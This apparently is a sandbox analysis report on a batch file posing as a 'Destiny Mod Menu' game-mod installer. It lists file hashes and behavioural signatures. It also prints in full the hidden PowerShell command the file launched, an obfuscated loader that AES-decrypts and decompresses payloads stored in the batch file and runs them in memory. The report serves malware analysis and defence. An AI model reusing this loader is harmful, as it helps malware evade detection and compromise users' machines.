Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win10v2004-20250217-en
General
-
Target
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
-
Size
265KB
-
MD5
512d6ccd633decbe126a38c51c29a280
-
SHA1
017e6fbb5eb2e367f37b4e5c33eb89cafcc7db48
-
SHA256
411b2ce5f266c6b25a645c37e7fd071772810ae5c74cf457db20f43f43277fe5
-
SHA512
fde1138b21117652348ec58f6ea92687fb94b111e0c49b5528d995a8e5e1588e7d1957761ca6eabb1010666f925b77a8032c129ec0839c5797a7e8381af24af7
-
SSDEEP
6144:jhbd8sLlMG4UZT009TJPirdyKRxv4oPhdP:ld9Jdr96YitZdP
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2904 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2904 2756 cmd.exe 31 PID 2756 wrote to memory of 2904 2756 cmd.exe 31 PID 2756 wrote to memory of 2904 2756 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a4Wny3pMw/quq+3CugnkbgjOgDqz7GpqcCoFYQ082Qg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McCcrn5ax83ehqoAfbIc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RELLW=New-Object System.IO.MemoryStream(,$param_var); $KdJRg=New-Object System.IO.MemoryStream; $atmEh=New-Object System.IO.Compression.GZipStream($RELLW, [IO.Compression.CompressionMode]::Decompress); $atmEh.CopyTo($KdJRg); $atmEh.Dispose(); $RELLW.Dispose(); $KdJRg.Dispose(); $KdJRg.ToArray();}function execute_function($param_var,$param2_var){ $LMajr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZqHWQ=$LMajr.EntryPoint; $ZqHWQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat';$VYMDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat').Split([Environment]::NewLine);foreach ($kwRBK in $VYMDR) { if ($kwRBK.StartsWith(':: ')) { $buoVq=$kwRBK.Substring(3); break; }}$payloads_var=[string[]]$buoVq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-